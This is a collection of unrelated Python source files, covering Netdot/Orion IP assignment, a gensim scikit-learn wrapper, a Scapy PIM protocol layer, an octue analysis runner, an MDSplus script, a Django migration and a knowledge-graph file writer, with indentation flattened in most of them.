allSlash30List = [ip for residentblock in residentblocks for ip in ipaddr.IPNetwork(residentblock).subnet(new_prefix=30)]
#convert list elements to ip network objects
usedSubnetList = [ipaddress.ip_network(item) for item in usedSubnetList]
allSlash30List = [ipaddress.ip_network(item) for item in allSlash30List]
# iterate through allSlash30List to check if an item in allSlash30List
# is a subnet of any item in usedSubnetList
# if not, the item becomes the assigned ip
for proposedIPNet in allSlash30List:
for usedIPNet in usedSubnetList:
if proposedIPNet.subnet_of(usedIPNet):
# move to the next proposed_net
break
else:
if str(usedIPNet) != str(usedSubnetList[-1]):
                        # keep checking until the last used_net, so the proposed_net is scanned against every used_net
continue
else:
return proposedIPNet
return False # no ip address found from netdot
def saveToNetdot(self,netdotURL,assignedIPNet,service_description=''):
''' Saves the assigned IP to netdot database'''
# login to netdot
pynetdot.setup(url=netdotURL,username=self.username,password=self.password)
record = pynetdot.Ipblock()
record.address = assignedIPNet
record.description = service_description
record.status = 5
# status options
# container = 0
# container = 1
        # discovered = 2
# reserved = 4
# subnet = 5
try:
saved_status = record.save()
            return bool(saved_status)
except requests.exceptions.HTTPError: return AttributeError
except requests.exceptions.MissingSchema: return AttributeError # if the URL is not valid
except AttributeError: return AttributeError # if credentials are wrong
except Exception as e: return str(type(e))+'\n'+str(e)
def addNodeToOrion(self,orion_server,client_address,service_description='',engine_id=3):
# disable SSL warnings
requests.packages.urllib3.disable_warnings()
# connect to orion API port=17778
npm = SwisClient(orion_server, self.username, self.password)
# define node properties
        # EngineID can be found in the SolarWinds Orion database server
props = {'IPAddress': client_address,
'ObjectSubType': 'ICMP',
'EngineID': engine_id,
'NodeName': service_description}
# add the node
try :
record = npm.create('Orion.Nodes', **props)
#extract the node id
nodeid = re.findall(r'(\d+)$',record)[0]
#enable ICMP polling
pollers_enabled = {'N.Status.ICMP.Native': True,
'N.ResponseTime.ICMP.Native': True}
# define pollers properties in a dictionary and create a list of those dicts
pollers_props = []
for poller in pollers_enabled:
pollers_props.append({'PollerType': poller,
'NetObject': 'N:' + nodeid,
'NetObjectType': 'N',
'NetObjectID': nodeid,
'Enabled': pollers_enabled[poller]})
# update the pollers in orion
for pollers in pollers_props: npm.create('Orion.Pollers', **pollers)
# poll the node
npm.invoke('Orion.Nodes', 'PollNow', 'N:' + nodeid)
return True
except ConnectionError: return ConnectionError
except requests.exceptions.HTTPError: return AttributeError # wrong credentials
except Exception as e: return '%s\n%s' %(str(type(e)),str(e))
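# A hypothetical usage sketch (not part of the original module): the URL,
# credentials, resident blocks and hostnames below are placeholders and must be
# replaced with real values for your Netdot / Orion deployment.
if __name__ == "__main__":
    servers = NetdotOrionServers("api-user", "api-password")
    assigned = servers.getFromNetdot("https://netdot.example.com/netdot",
                                     ["10.10.0.0/24"])
    if isinstance(assigned, (ipaddress.IPv4Network, ipaddress.IPv6Network)):
        servers.saveToNetdot("https://netdot.example.com/netdot", str(assigned),
                             service_description="example point-to-point link")
        servers.addNodeToOrion("orion.example.com",
                               str(assigned.network_address + 1),
                               service_description="example customer CPE")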
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
RESOURCE_FILEDS = ["labels", "annotations"]
RESOURCE_KINDS_FOR_MONITOR_INJECTOR = ["Service", "Deployment", "StatefulSet", "Job", "DaemonSet"]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2011 Radim Rehurek <radimrehurek@seznam.cz>
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
Scikit learn interface for gensim for easy use of gensim with scikit-learn
Follows scikit-learn API conventions
"""
import numpy as np
from sklearn.base import TransformerMixin, BaseEstimator
from sklearn.exceptions import NotFittedError
from gensim import models
from gensim.sklearn_integration import BaseSklearnWrapper
class SklRpModel(BaseSklearnWrapper, TransformerMixin, BaseEstimator):
"""
Base RP module
"""
def __init__(self, id2word=None, num_topics=300):
"""
Sklearn wrapper for RP model. Class derived from gensim.models.RpModel.
"""
self.gensim_model = None
self.id2word = id2word
self.num_topics = num_topics
def get_params(self, deep=True):
"""
Returns all parameters as dictionary.
"""
return {"id2word": self.id2word, "num_topics": self.num_topics}
def set_params(self, **parameters):
"""
Set all parameters.
"""
super(SklRpModel, self).set_params(**parameters)
return self
def fit(self, X, y=None):
"""
Fit the model according to the given training data.
Calls gensim.models.RpModel
"""
self.gensim_model = models.RpModel(corpus=X, id2word=self.id2word, num_topics=self.num_topics)
return self
def transform(self, docs):
"""
Take documents/corpus as input.
Return RP representation of the input documents/corpus.
The input `docs` can correspond to multiple documents like : [ [(0, 1.0), (1, 1.0), (2, 1.0)], [(0, 1.0), (3, 1.0), (4, 1.0), (5, 1.0), (6, 1.0), (7, 1.0)] ]
or a single document like : [(0, 1.0), (1, 1.0), (2, 1.0)]
"""
if self.gensim_model is None:
raise NotFittedError("This model has not been fitted yet. Call 'fit' with appropriate arguments before using this method.")
# The input as array of array
check = lambda x: [x] if isinstance(x[0], tuple) else x
docs = check(docs)
X = [[] for _ in range(0, len(docs))]
for k, v in enumerate(docs):
transformed_doc = self.gensim_model[v]
probs_docs = list(map(lambda x: x[1], transformed_doc))
# Everything should be equal in length
if len(probs_docs) != self.num_topics:
probs_docs.extend([1e-12] * (self.num_topics - len(probs_docs)))
X[k] = probs_docs
return np.reshape(np.array(X), (len(docs), self.num_topics))
def partial_fit(self, X):
raise NotImplementedError("'partial_fit' has not been implemented for SklRpModel")
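# A minimal usage sketch (assumption: a toy bag-of-words corpus built with
# gensim.corpora.Dictionary; not part of the original module).
if __name__ == "__main__":
    from gensim.corpora import Dictionary
    texts = [["human", "computer", "interface"],
             ["graph", "trees", "minors"],
             ["graph", "computer", "survey"]]
    dictionary = Dictionary(texts)
    corpus = [dictionary.doc2bow(text) for text in texts]
    model = SklRpModel(id2word=dictionary, num_topics=2)
    model.fit(corpus)
    print(model.transform(corpus).shape)  # expected: (3, 2)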
|
# This file is part of Scapy
# Scapy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# any later version.
#
# Scapy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Scapy. If not, see <http://www.gnu.org/licenses/>.
#
# scapy.contrib.description = Protocol Independent Multicast (PIM)
# scapy.contrib.status = loads
"""
References:
- https://tools.ietf.org/html/rfc4601
- https://www.iana.org/assignments/pim-parameters/pim-parameters.xhtml
"""
import struct
from scapy.packet import Packet, bind_layers
from scapy.fields import BitFieldLenField, BitField, BitEnumField, ByteField, \
ShortField, XShortField, IPField, PacketListField, \
IntField, FieldLenField, BoundStrLenField, FlagsField
from scapy.layers.inet import IP
from scapy.utils import checksum
from scapy.compat import orb
from scapy.config import conf
from scapy.volatile import RandInt
PIM_TYPE = {
0: "Hello",
1: "Register",
2: "Register-Stop",
3: "Join/Prune",
4: "Bootstrap",
5: "Assert",
6: "Graft",
7: "Graft-Ack",
8: "Candidate-RP-Advertisement"
}
class PIMv2Hdr(Packet):
name = "Protocol Independent Multicast Version 2 Header"
fields_desc = [BitField("version", 2, 4),
BitEnumField("type", 0, 4, PIM_TYPE),
ByteField("reserved", 0),
XShortField("chksum", None)]
def post_build(self, p, pay):
"""
Called implicitly before a packet is sent to compute and
place PIM checksum.
Parameters:
        self  The instantiation of a PIMv2Hdr class
p The PIMv2Hdr message in hex in network byte order
pay Additional payload for the PIMv2Hdr message
"""
p += pay
if self.chksum is None:
ck = checksum(p)
p = p[:2] + struct.pack("!H", ck) + p[4:]
return p
def _guess_pim_tlv_class(h_classes, default_key, pkt, **kargs):
cls = conf.raw_layer
if len(pkt) >= 2:
tlvtype = orb(pkt[1])
cls = h_classes.get(tlvtype, default_key)
return cls(pkt, **kargs)
class _PIMGenericTlvBase(Packet):
fields_desc = [ByteField("type", 0),
FieldLenField("length", None, length_of="value", fmt="B"),
BoundStrLenField("value", "",
length_from=lambda pkt: pkt.length)]
def guess_payload_class(self, p):
return conf.padding_layer
def extract_padding(self, s):
return "", s
##################################
# PIMv2 Hello
##################################
class _PIMv2GenericHello(_PIMGenericTlvBase):
name = "PIMv2 Generic Hello"
def _guess_pimv2_hello_class(p, **kargs):
return _guess_pim_tlv_class(PIMv2_HELLO_CLASSES, None, p, **kargs)
class _PIMv2HelloListField(PacketListField):
def __init__(self):
PacketListField.__init__(self, "option", [], _guess_pimv2_hello_class)
class PIMv2Hello(Packet):
name = "PIMv2 Hello Options"
fields_desc = [
_PIMv2HelloListField()
]
class PIMv2HelloHoldtime(_PIMv2GenericHello):
name = "PIMv2 Hello Options : Holdtime"
fields_desc = [
ShortField("type", 1),
FieldLenField("length", None, length_of="holdtime", fmt="!H"),
ShortField("holdtime", 105)
]
class PIMv2HelloLANPruneDelayValue(_PIMv2GenericHello):
name = "PIMv2 Hello Options : LAN Prune Delay Value"
fields_desc = [
FlagsField("t", 0, 1, [0, 1]),
BitField("propagation_delay", 500, 15),
ShortField("override_interval", 2500),
]
class PIMv2HelloLANPruneDelay(_PIMv2GenericHello):
name = "PIMv2 Hello Options : LAN Prune Delay"
fields_desc = [
ShortField("type", 2),
FieldLenField("length", None, length_of="value", fmt="!H"),
PacketListField("value", PIMv2HelloLANPruneDelayValue(),
PIMv2HelloLANPruneDelayValue,
length_from=lambda pkt: pkt.length)
]
class PIMv2HelloDRPriority(_PIMv2GenericHello):
name = "PIMv2 Hello Options : DR Priority"
fields_desc = [
ShortField("type", 19),
FieldLenField("length", None, length_of="dr_priority", fmt="!H"),
IntField("dr_priority", 1)
]
class PIMv2HelloGenerationID(_PIMv2GenericHello):
name = "PIMv2 Hello Options : Generation ID"
fields_desc = [
ShortField("type", 20),
FieldLenField(
"length", None, length_of="generation_id", fmt="!H"
),
IntField("generation_id", RandInt())
]
class PIMv2HelloStateRefreshValue(_PIMv2GenericHello):
name = "PIMv2 Hello Options : State-Refresh Value"
fields_desc = [ByteField("version", 1),
ByteField("interval", 0),
ShortField("reserved", 0)]
class PIMv2HelloStateRefresh(_PIMv2GenericHello):
name = "PIMv2 Hello Options : State-Refresh"
fields_desc = [
ShortField("type", 21),
FieldLenField(
"length", None, length_of="value", fmt="!H"
),
PacketListField("value", PIMv2HelloStateRefreshValue(),
PIMv2HelloStateRefreshValue)
]
PIMv2_HELLO_CLASSES = {
1: PIMv2HelloHoldtime,
2: PIMv2HelloLANPruneDelay,
19: PIMv2HelloDRPriority,
20: PIMv2HelloGenerationID,
21: PIMv2HelloStateRefresh,
None: _PIMv2GenericHello,
}
##################################
# PIMv2 Join/Prune
##################################
class PIMv2JoinPruneAddrsBase(_PIMGenericTlvBase):
fields_desc = [
ByteField("addr_family", 1),
ByteField("encoding_type", 0),
BitField("rsrvd", 0, 5),
BitField("sparse", 0, 1),
BitField("wildcard", 0, 1),
BitField("rpt", 1, 1),
ByteField("mask_len", 32),
IPField("src_ip", "0.0.0.0")
]
class PIMv2JoinAddrs(PIMv2JoinPruneAddrsBase):
name = "PIMv2 Join: Source Address"
class PIMv2PruneAddrs(PIMv2JoinPruneAddrsBase):
name = "PIMv2 Prune: Source Address"
class PIMv2GroupAddrs(_PIMGenericTlvBase):
name = "PIMv2 Join/Prune: Multicast Group Address"
fields_desc = [
ByteField("addr_family", 1),
ByteField("encoding_type", 0),
BitField("bidirection", 0, 1),
BitField("reserved", 0, 6),
BitField("admin_scope_zone", 0, 1),
ByteField("mask_len", 32),
IPField("gaddr", "0.0.0.0"),
BitFieldLenField("num_joins", None, size=16, count_of="join_ips"),
BitFieldLenField("num_prunes", None, size=16, count_of="prune_ips"),
PacketListField("join_ips", [], PIMv2JoinAddrs,
count_from=lambda x: x.num_joins),
PacketListField("prune_ips", [], PIMv2PruneAddrs,
count_from=lambda x: x.num_prunes),
]
class PIMv2JoinPrune(_PIMGenericTlvBase):
name = "PIMv2 Join/Prune Options"
fields_desc = [
ByteField("up_addr_family", 1),
ByteField("up_encoding_type", 0),
IPField("up_neighbor_ip", "0.0.0.0"),
ByteField("reserved", 0),
FieldLenField("num_group", None, count_of="jp_ips", fmt="B"),
ShortField("holdtime", 210),
PacketListField("jp_ips", [], PIMv2GroupAddrs,
count_from=lambda pkt: pkt.num_group)
]
bind_layers(IP, PIMv2Hdr, proto=103)
bind_layers(PIMv2Hdr, PIMv2Hello, type=0)
bind_layers(PIMv2Hdr, PIMv2JoinPrune, type=3)
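# A minimal usage sketch (not part of the original contrib module): build a
# PIMv2 Hello carrying a Holdtime and a Generation ID option. 224.0.0.13 is
# the well-known ALL-PIM-ROUTERS multicast group.
if __name__ == "__main__":
    pkt = (IP(src="192.0.2.1", dst="224.0.0.13") /
           PIMv2Hdr(type=0) /
           PIMv2Hello(option=[PIMv2HelloHoldtime(holdtime=105),
                              PIMv2HelloGenerationID(generation_id=1234)]))
    pkt.show2()  # computes the PIM checksum and prints the decoded packet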
|
import importlib
import logging
import os
import sys
import google.api_core.exceptions
from google.cloud import secretmanager
from octue.cloud.credentials import GCPCredentialsManager
from octue.log_handlers import apply_log_handler, get_formatter
from octue.resources import Child
from octue.resources.analysis import CLASS_MAP, Analysis
from octue.utils import gen_uuid
from twined import Twine
logger = logging.getLogger(__name__)
class Runner:
"""Runs analyses in the app framework
The Runner class provides a set of configuration parameters for use by your application, together with a range of
methods for managing input and output file parsing as well as controlling logging.
:param Union[AppFrom, callable, str] app_src: Either an instance of the AppFrom manager class which has a run() method, or a function which accepts a single parameter (the instantiated analysis), or a string pointing to an application folder (which should contain an 'app.py' function like the templates)
:param str|twined.Twine twine: path to the twine file, a string containing valid twine json, or a Twine instance
:param str|dict|_io.TextIOWrapper|None configuration_values: The strand data. Can be expressed as a string path of a *.json file (relative or absolute), as an open file-like object (containing json data), as a string of json data or as an already-parsed dict.
:param str|dict|_io.TextIOWrapper|None configuration_manifest: The strand data. Can be expressed as a string path of a *.json file (relative or absolute), as an open file-like object (containing json data), as a string of json data or as an already-parsed dict.
:param Union[str, path-like, None] output_manifest_path: Path where output data will be written
:param Union[str, dict, None] children: The children strand data. Can be expressed as a string path of a *.json file (relative or absolute), as an open file-like object (containing json data), as a string of json data or as an already-parsed dict.
:param bool skip_checks: If true, skip the check that all files in the manifest are present on disc - this can be an extremely long process for large datasets.
:param str|None project_name: name of Google Cloud project to get credentials from
:return None:
"""
def __init__(
self,
app_src,
twine="twine.json",
configuration_values=None,
configuration_manifest=None,
output_manifest_path=None,
children=None,
skip_checks=False,
project_name=None,
):
self.app_src = app_src
self.output_manifest_path = output_manifest_path
self.children = children
self.skip_checks = skip_checks
# Ensure the twine is present and instantiate it.
if isinstance(twine, Twine):
self.twine = twine
else:
self.twine = Twine(source=twine)
logger.debug("Parsed twine with strands %r", self.twine.available_strands)
# Validate and initialise configuration data
self.configuration = self.twine.validate(
configuration_values=configuration_values,
configuration_manifest=configuration_manifest,
cls=CLASS_MAP,
)
logger.debug("Configuration validated.")
self._project_name = project_name
def run(
self,
analysis_id=None,
input_values=None,
input_manifest=None,
analysis_log_level=logging.INFO,
analysis_log_handler=None,
):
"""Run an analysis
:param str|None analysis_id: UUID of analysis
:param Union[str, dict, None] input_values: the input_values strand data. Can be expressed as a string path of a *.json file (relative or absolute), as an open file-like object (containing json data), as a string of json data or as an already-parsed dict.
:param Union[str, octue.resources.manifest.Manifest, None] input_manifest: The input_manifest strand data. Can be expressed as a string path of a *.json file (relative or absolute), as an open file-like object (containing json data), as a string of json data or as an already-parsed dict.
:param str analysis_log_level: the level below which to ignore log messages
:param logging.Handler|None analysis_log_handler: the logging.Handler instance which will be used to handle logs for this analysis run. Handlers can be created as per the logging cookbook https://docs.python.org/3/howto/logging-cookbook.html but should use the format defined above in LOG_FORMAT.
:return: None
"""
if hasattr(self.twine, "credentials"):
self._populate_environment_with_google_cloud_secrets()
credentials = self.twine.credentials
else:
credentials = None
inputs = self.twine.validate(
input_values=input_values,
input_manifest=input_manifest,
credentials=credentials,
children=self.children,
cls=CLASS_MAP,
allow_missing=False,
allow_extra=False,
)
logger.debug("Inputs validated.")
if inputs["children"] is not None:
inputs["children"] = {
child["key"]: Child(name=child["key"], id=child["id"], backend=child["backend"])
for child in inputs["children"]
}
outputs_and_monitors = self.twine.prepare("monitors", "output_values", "output_manifest", cls=CLASS_MAP)
# TODO this is hacky, we need to rearchitect the twined validation so we can do this kind of thing in there
outputs_and_monitors["output_manifest"] = self._update_manifest_path(
outputs_and_monitors.get("output_manifest", None),
self.output_manifest_path,
)
analysis_id = str(analysis_id) if analysis_id else gen_uuid()
analysis_logger_name = f"{__name__} | analysis-{analysis_id}"
formatter = get_formatter()
# Apply the default stderr log handler to the analysis logger.
analysis_logger = apply_log_handler(
logger_name=analysis_logger_name, log_level=analysis_log_level, formatter=formatter
)
# Also apply the given analysis log handler if given.
if analysis_log_handler:
apply_log_handler(
logger_name=analysis_logger_name,
handler=analysis_log_handler,
log_level=analysis_log_level,
formatter=formatter,
)
# Stop messages logged by the analysis logger being repeated by the root logger.
analysis_logger.propagate = False
analysis = Analysis(
id=analysis_id,
logger=analysis_logger,
twine=self.twine,
skip_checks=self.skip_checks,
**self.configuration,
**inputs,
**outputs_and_monitors,
)
try:
if hasattr(self.app_src, "run"):
self.app_src.run(analysis)
elif isinstance(self.app_src, str):
with AppFrom(self.app_src) as app:
app.run(analysis)
else:
self.app_src(analysis)
except ModuleNotFoundError as e:
raise ModuleNotFoundError(f"{e.msg} in {os.path.abspath(self.app_src)!r}.")
except Exception as e:
analysis_logger.error(str(e))
raise e
return analysis
@staticmethod
def _update_manifest_path(manifest, pathname):
"""A Quick hack to stitch the new Pathable functionality in the 0.1.4 release into the CLI and runner.
The way we define a manifest path can be more robustly implemented as we migrate functionality into the twined
library
:param manifest:
:type manifest:
:param pathname:
:type pathname:
:return:
:rtype:
"""
if manifest is not None and hasattr(pathname, "endswith"):
if pathname.endswith(".json"):
manifest.path = os.path.split(pathname)[0]
# Otherwise do nothing and rely on manifest having its path variable set already
return manifest
def _populate_environment_with_google_cloud_secrets(self):
"""Get any secrets specified in the credentials strand from Google Cloud Secret Manager and put them in the
local environment, ready for use by the runner.
:return None:
"""
missing_credentials = tuple(
credential for credential in self.twine.credentials if credential["name"] not in os.environ
)
if not missing_credentials:
return
google_cloud_credentials = GCPCredentialsManager().get_credentials()
secrets_client = secretmanager.SecretManagerServiceClient(credentials=google_cloud_credentials)
if google_cloud_credentials is None:
project_name = self._project_name
else:
project_name = google_cloud_credentials.project_id
for credential in missing_credentials:
secret_path = secrets_client.secret_version_path(
project=project_name, secret=credential["name"], secret_version="latest"
)
try:
secret = secrets_client.access_secret_version(name=secret_path).payload.data.decode("UTF-8")
except google.api_core.exceptions.NotFound:
# No need to raise an error here as the Twine validation that follows will do so.
continue
os.environ[credential["name"]] = secret
def unwrap(fcn):
"""Recurse through wrapping to get the raw function without decorators."""
if hasattr(fcn, "__wrapped__"):
return unwrap(fcn.__wrapped__)
return fcn
class AppFrom:
"""Context manager that imports module 'app' from user's code base at a location app_path.
The manager will issue a warning if an existing module called "app" is already loaded.
The manager makes a temporary addition to the system path (to ensure app is loaded from the correct path)
The manager will unload the module (by deleting it from sys.modules) on exit, enabling
with AppFrom('/path/to/dir') as app:
Runner().run(app)
"""
def __init__(self, app_path="."):
self.app_path = os.path.abspath(os.path.normpath(app_path))
logger.debug("Initialising AppFrom context at app_path %s", self.app_path)
self.app_module = None
def __enter__(self):
# Warn on an app present on the system path
if "app" in sys.modules.keys():
logger.warning(
"Module 'app' already on system path. Using 'AppFrom' context will yield unexpected results. Avoid using 'app' as a python module, except for your main entrypoint"
)
# Insert the present directory first on the system path
sys.path.insert(0, self.app_path)
# Import the app from the present directory
self.app_module = importlib.import_module("app")
# Immediately clean up the entry to the system path (don't use "remove" because if the user has it in their
# path, this'll be an unexpected side effect, and don't do it in cleanup in case the called code inserts a path)
sys.path.pop(0)
logger.debug("Imported app at app_path and cleaned up temporary modification to sys.path %s", self.app_path)
return self
def __exit__(self, exc_type, exc_value, traceback):
# Unload the imported module
del sys.modules["app"]
logger.debug("Deleted app from sys.modules and cleaned up (app_path %s)", self.app_path)
@property
def run(self):
"""Returns the unwrapped run function from app.py in the application's root directory"""
return unwrap(self.app_module.run)
|
'''
This script runs through a range of shots and toggles the state of the data nodes associated with antenna and source voltage and current.
'''
import sys
from MDSplus import *
s1=int(sys.argv[1])
#Get shot range
if(len(sys.argv)>2) :
s2=int(sys.argv[2])
else :
s2=s1
def toggleNode(n) :
n.setOn(not n.isOn())
for s in range(s1,s2+1) :
tree=Tree('magnetics',s) #Get tree out of MDSplus
toggleNode(tree.getNode('shoelace:ant_v'))
toggleNode(tree.getNode('shoelace:ant_i'))
toggleNode(tree.getNode('shoelace:src_v'))
    toggleNode(tree.getNode('shoelace:src_i'))
print("Toggled Shoelace power nodes for shot {0:d}".format(s))
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2018-02-02 00:32
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('email', models.EmailField(max_length=255, unique=True, verbose_name='email address')),
('user_role', models.CharField(blank=True, choices=[('Requester', 'Requester'), ('Authoriser', 'Authoriser')], max_length=100, null=True)),
('username', models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 30 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=30, unique=True, validators=[django.core.validators.RegexValidator('^[\\w.@+-]+$', 'Enter a valid username. This value may contain only letters, numbers and @/./+/-/_ characters.', 'invalid')])),
('first_name', models.CharField(blank=True, max_length=30)),
('last_name', models.CharField(blank=True, max_length=30)),
('date_of_birth', models.DateField()),
('phone_number', models.CharField(blank=True, max_length=30)),
('department', models.CharField(blank=True, max_length=30)),
('is_active', models.BooleanField(default=True)),
('is_admin', models.BooleanField(default=False)),
],
options={
'abstract': False,
},
),
]
|
# -*- coding: utf-8 -*-
import os
import typing
import insanity
from collections import abc
from reldata import io
from reldata.data import individual
from reldata.data import knowledge_graph
__author__ = "Patrick Hohenecker"
__copyright__ = (
"Copyright (c) 2017, Patrick Hohenecker\n"
"All rights reserved.\n"
"\n"
"Redistribution and use in source and binary forms, with or without\n"
"modification, are permitted provided that the following conditions are met:\n"
"\n"
"1. Redistributions of source code must retain the above copyright notice, this\n"
" list of conditions and the following disclaimer.\n"
"2. Redistributions in binary form must reproduce the above copyright notice,\n"
" this list of conditions and the following disclaimer in the documentation\n"
" and/or other materials provided with the distribution.\n"
"\n"
"THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n"
"ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n"
"WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n"
"DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR\n"
"ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n"
"(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n"
"LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n"
"ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n"
"(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n"
"SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
)
__license__ = "BSD-2-Clause"
__version__ = "2017.1"
__date__ = "Nov 12, 2017"
__maintainer__ = "Patrick Hohenecker"
__email__ = "mail@paho.at"
__status__ = "Development"
class KgWriter(object):
"""A class for writing :class:`knowledge_graph.KnowledgeGraph`s to disk."""
VOCAB_PATTERN = "{index} {name}\n"
"""str: A pattern for writing class/relation/literal definitions."""
TRIPLES_PATTERN = "{subject} {predicate} {object}\n"
"""str: A pattern for writing triples."""
TYPED_TRIPLES_PATTERN = "{type} {subject} {predicate} {object}\n"
"""str: A pattern for writing triples that are marked as positive and negative, respectively."""
# METHODS ########################################################################################################
@classmethod
def _create_membership_vectors(
cls,
kg: knowledge_graph.KnowledgeGraph,
ind: individual.Individual
) -> typing.Tuple[str, str, str]:
num_classes = len(kg.classes)
spec = ["0"] * num_classes
inf = ["0"] * num_classes
pred = ["0"] * num_classes
for c in ind.classes:
value = "1" if c.is_member else "-1"
if c.inferred:
inf[c.cls.index] = value
elif c.prediction:
pred[c.cls.index] = value
else:
spec[c.cls.index] = value
return " ".join(spec) + "\n", " ".join(inf) + "\n", " ".join(pred) + "\n"
@classmethod
def write(
cls,
kg: knowledge_graph.KnowledgeGraph,
target_dir: str,
base_name: str,
index: int = None
) -> None:
"""Writes the provided knowledge graph to the specified path.
Args:
kg (:class:`knowledge_graph.KnowledgeGraph`): The knowledge graph to write to disk.
target_dir (str): The path of the directory to place all the files in.
base_name (str): The base name to use, i.e., the prefix, included in all files' names.
            index (int, optional): If this is provided, then ``target_dir`` and ``base_name`` are assumed to specify a
sequence of knowledge graphs, and ``index`` specifies the element of this sequence to be written to
disk.
Raises:
ValueError: If ``target_dir`` does not refer to an existing directory.
"""
# sanitize args
insanity.sanitize_type("kg", kg, knowledge_graph.KnowledgeGraph)
target_dir = str(target_dir)
base_name = str(base_name)
if not os.path.isdir(target_dir):
raise ValueError("The directory <target_dir> does not exist: '{}'!".format(target_dir))
if index is not None:
insanity.sanitize_type("index", index, int)
insanity.sanitize_range("index", index, minimum=0)
# //////// Write Vocabulary ------------------------------------------------------------------------------------
# write classes
with open(os.path.join(target_dir, base_name + io.CLASSES_VOCAB_EXT), "w") as f:
for c in kg.classes:
f.write(cls.VOCAB_PATTERN.format(index=c.index, name=c.name))
# write literals
with open(os.path.join(target_dir, base_name + io.LITERALS_VOCAB_EXT), "w") as f:
for l in kg.literals:
f.write(cls.VOCAB_PATTERN.format(index=l.index, name=l.name))
# write relations
with open(os.path.join(target_dir, base_name + io.RELATIONS_VOCAB_EXT), "w") as f:
for r in kg.relations:
f.write(cls.VOCAB_PATTERN.format(index=r.index, name=r.name))
# //////// Write Individuals -----------------------------------------------------------------------------------
with open(os.path.join(target_dir, base_name + io.INDIVIDUALS_SPEC_EXT), "w") as f:
for i in kg.individuals:
f.write(cls.VOCAB_PATTERN.format(index=i.index, name=i.name))
# //////// Write Class Memberships -----------------------------------------------------------------------------
classes_spec = os.path.join(target_dir, base_name + io.CLASSES_SPEC_EXT)
classes_inf = os.path.join(target_dir, base_name + io.CLASSES_INF_EXT)
classes_pred = os.path.join(target_dir, base_name + io.CLASSES_PRED_EXT)
if index is not None:
classes_spec += "." + str(index)
classes_inf += "." + str(index)
classes_pred += "." + str(index)
with open(classes_spec, "w") as f_spec:
with open(classes_inf, "w") as f_inf:
with open(classes_pred, "w") as f_pred:
for i in kg.individuals:
spec, inf, pred = cls._create_membership_vectors(kg, i)
f_spec.write(spec)
f_inf.write(inf)
f_pred.write(pred)
# //////// Write Literals --------------------------------------------------------------------------------------
literals_spec = os.path.join(target_dir, base_name + io.LITERALS_SPEC_EXT)
literals_inf = os.path.join(target_dir, base_name + io.LITERALS_INF_EXT)
literals_pred = os.path.join(target_dir, base_name + io.LITERALS_PRED_EXT)
if index is not None:
literals_spec += "." + str(index)
literals_inf += "." + str(index)
literals_pred += "." + str(index)
with open(literals_spec, "w") as f_spec:
with open(literals_inf, "w") as f_inf:
with open(literals_pred, "w") as f_pred:
for i in kg.individuals:
for l in i.literals:
line = cls.TRIPLES_PATTERN.format(
subject=i.index,
predicate=l.literal.index,
object=l.value
)
if l.inferred:
f_inf.write(line)
elif l.prediction:
f_pred.write(line)
else:
f_spec.write(line)
# //////// Write Relations -------------------------------------------------------------------------------------
relations_spec = os.path.join(target_dir, base_name + io.RELATIONS_SPEC_EXT)
relations_inf = os.path.join(target_dir, base_name + io.RELATIONS_INF_EXT)
relations_pred = os.path.join(target_dir, base_name + io.RELATIONS_PRED_EXT)
if index is not None:
relations_spec += "." + str(index)
relations_inf += "." + str(index)
relations_pred += "." + str(index)
with open(relations_spec, "w") as f_spec:
with open(relations_inf, "w") as f_inf:
with open(relations_pred, "w") as f_pred:
for t in kg.triples:
line = cls.TYPED_TRIPLES_PATTERN.format(
type=("+" if t.positive else "-"),
subject=t.subject.index,
predicate=t.predicate.index,
object=t.object.index
)
if t.inferred:
f_inf.write(line)
elif t.prediction:
f_pred.write(line)
else:
f_spec.write(line)
@classmethod
def write_sequence(
cls,
seq: typing.Sequence[knowledge_graph.KnowledgeGraph],
target_dir: str,
base_name: str
) -> None:
"""Writes the provided knowledge graph to the specified path.
Args:
seq (sequence[:class:`knowledge_graph.KnowledgeGraph`]): The knowledge graph sequence to write to disk.
